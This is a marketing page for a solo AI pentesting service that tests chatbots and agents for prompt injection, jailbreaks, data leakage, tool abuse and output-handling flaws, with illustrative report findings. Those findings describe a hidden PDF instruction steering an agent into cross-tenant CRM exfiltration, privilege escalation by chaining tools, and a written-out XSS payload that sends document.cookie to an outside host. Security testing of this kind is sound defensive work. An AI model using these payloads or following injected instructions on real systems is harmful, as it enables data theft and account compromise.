Independent AI Pentest

Adversarial testing for the AI in your product.

Manual pentest engagements against the chatbot, agent, or copilot you're shipping. The deliverable is a written report your customer's security team — or your SOC 2 auditor — will accept.

Start a scoping conversation See what we test

probe.live// illustrative Running

targetcustomer-support-bot · gpt-4o w/ tools

>> attacker

<< model

Scenario 01 / 03 system prompt extracted

Who it's for

Built for AI product startups whose buyers are starting to ask security questions.

If any of these describe your week, the deliverable from a Ferrok engagement is the document that closes the loop.

Signal 01

A prospect's procurement or security team sent a questionnaire that called out your AI feature specifically — and you don't have a clean answer for the prompt-injection question.

Signal 02

Your SOC 2 auditor flagged the LLM call as out of scope for the existing controls and asked you to demonstrate something. You need a third-party artifact, not another internal review.

Signal 03

You're about to launch an agent or tool-using AI feature with broader permissions than your existing surface, and you want a defensible adversarial review before it goes live.

Scope of work

What gets tested.

Every engagement covers the prompt and tool layer of your AI system. The exact attack surface is scoped in the intake call — what's listed below is the standard menu.

Prompt injection

Direct and indirect injection across every untrusted input your model sees — user messages, retrieved documents, tool outputs, third-party content. Includes the harder cases: payload smuggling, multi-turn, encoded, and out-of-band injection.

Jailbreaks & policy bypass

Adversarial attempts to push the model past its safety guidelines, system prompt, or operator-defined refusals — using technique families that survive vendor patches, not the hot jailbreak of the week.

Data leakage

Extraction of system prompts, retrieval indexes, training data, other users' history, embedded credentials, and PII that wasn't supposed to leave the boundary — via the model and via the surrounding plumbing.

Tool & agent abuse

Coercing the model into invoking tools it shouldn't, with arguments it shouldn't construct, against targets it shouldn't reach. Privilege escalation across multi-step agent loops, function-calling boundaries, and MCP-style tool servers.

Output handling

Where model output flows into a browser, a shell, a database query, an HTTP client, or another model — and what an adversary can do with that. XSS via assistant rendering, SSRF via agent fetches, prompt-to-SQL, prompt-to-RCE.

Prompt-layer supply chain

The system prompt, the retrieval corpus, the function specs, the third-party tools your agent loads — all attack surface you don't usually think about. We cover what an attacker would target if they couldn't reach the model directly.

Anatomy of a finding

What lands in your report.

Each finding ships with severity, technique, reproducible evidence, business impact, and remediation guidance — in language your engineering team can act on and your customer's security team can read.

// Illustrative finding types — not real client data

FRK-0142 Critical

Prompt injection · indirect

Customer-uploaded PDF coerces support agent into CRM exfiltration.

A hidden instruction block inside a user-uploaded PDF was followed by the assistant on the next turn, invoking the crm.lookup_contact tool against records belonging to other tenants.

payload > 
resp > {"contacts":[{"email":"REDACTED"}...]}

Reproduced Triage: scope & sanitization

FRK-0157 High

Tool & agent abuse

Free-tier user induces agent to chain two permitted tools into an admin action.

Two operations individually allowed by the policy, when called in sequence, returned tenant-scoped audit logs through a tool the user's plan should not have reached.

turn 3 > tool=workspace.list_members ok
turn 5 > tool=audit.export_range
scope=REDACTED ok — should require role=admin

Reproduced Triage: policy boundary

FRK-0163 Medium

Output handling

Stored XSS via assistant markdown renderer in shared thread view.

Adversarial assistant output rendered as an active <img onerror> in the conversation history pane; persists for any user later viewing the thread.

render> <img src=x onerror="fetch('//REDACTED'+document.cookie)">
scope > persists across sessions, all viewers

Reproduced Triage: output sanitization

Read a full illustrative engagement report — six findings deep, with OWASP LLM Top 10 mapping and a remediation priority matrix.

Download sample report (PDF) →

Engagement process

How an engagement runs.

Most engagements start with a 30-minute scoping call and ship a written report two to four weeks later. No deliverable is generated by an LLM — the report is hand-written from the test artifacts.

Engagements are fixed-fee and scoped per feature — we agree the number together on the scoping call, sized to the attack surface and the depth of testing you need. No surprises after the SOW.

01

Scoping call

30 minutes. We map the AI feature's attack surface, agree what's in and out of scope, and decide whether to run against a staging instance, a sandboxed account, or production behind a feature flag.

~30 min

02

Statement of work

Written SOW with explicit scope, target environments, attack categories, deliverable format, timeline, and a fixed engagement fee. Mutual NDA up front. You sign before we start.

~2 days

03

Manual testing

Hands-on adversarial testing across the agreed scope. Critical findings are reported as we discover them — you don't wait for the report to start patching. All test artifacts are preserved for the writeup.

1–3 weeks

04

Written report

Findings with severity, reproduction steps, evidence, and remediation guidance. Executive summary suitable for handing to a customer's security team or a SOC 2 auditor. One round of remediation re-testing included.

~1 week

About Ferrok

Independent. Hands-on. Written for the people who'll read the report.

Ferrok runs manual pentest engagements against the AI features inside product companies — the chatbots, copilots, and agentic workflows that customers and procurement teams are starting to ask hard security questions about.

Engagements are run personally. There is no junior consultant, no offshore team, no red-team-as-a-service platform between you and the work. The report is written by the person who did the testing — in language your engineering team can act on and your customer's security team can read.

Get in touch

Start a scoping conversation.

Tell me what you're shipping and what's prompting the security review. I'll get back to you within one business day to set up a 30-minute scoping call. Pricing is scoped per engagement — the call is free.

Thanks — got it.

I'll reply within one business day from r2founds@gmail.com to set up the scoping call. If you don't see it in 24 hours, check spam or email me directly.

No newsletter, no marketing list. Your details are used only to scope this engagement.